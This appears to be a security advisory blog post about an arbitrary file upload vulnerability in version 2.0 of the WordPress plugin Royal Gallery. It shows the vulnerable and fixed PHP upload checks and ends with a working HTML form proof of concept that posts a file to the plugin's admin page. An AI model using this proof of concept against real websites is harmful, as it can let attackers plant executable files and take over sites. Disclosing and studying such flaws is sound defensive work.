Yesterday we released posts for vulnerabilities in 16 plugins, which all shared the same code that allowed anyone access to functions only intended to be accessible to Administrator level users. For two of those plugins though the most serious vulnerability permitted by this did not exist. That vulnerability was the ability to upload arbitrary files, which could allow a hacker to upload .php file and then use that to perform any action they want on the website.
Looking back through the old versions we can see that for one those plugins, Royal Gallery, that vulnerability had actually existed in version 2.0 and then was fixed in 2.1. In a reminder that you really need to keep all of your plugins up to date all the time, instead of trying to update them upon becoming aware of a security issue (which far to often WordPress security companies tacitly promote by telling people they should update some specific plugin right away), the changelog entry for that version reads only:
Where ever you place the short code, there only the slider shows. Previously it use to show on top of content.
So you wouldn’t have known that it included a security update.
Restricting File Uploads
So how was it fixed?
When a file upload request is being processed in version 2.0 the following checks were done:
if( isset($_FILES) && isset($_FILES['album_img']) && $_FILES['album_img']['size'] > 0 )
In 2.1 an additional check to see if the file’s extension is one that is allowed is done:
if( isset($_FILES) && isset($_FILES['album_img']) && $_FILES['album_img']['size'] > 0 && array_search(strtolower(strrchr($_FILES['album_img']['name'], '.')), $this->allow_ext))
The allowed extensions are specified on this line:
$this->allow_ext = array(1=>'.jpg','.gif','.png','.bmp','.tif','.tiff','.jpeg');
That restricts you to only upload files with image extensions, so you could not, for example, upload a .php file.
Proof of Concept
The following proof of concept will create a new album in the plugin, with the selected file as the Album Image. If there are no pre-existing album the uploaded file will be located in the directory /wp-content/uploads/splendidgallery/1_uploadfolder/big/.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=splendidgallery_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="spg_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html>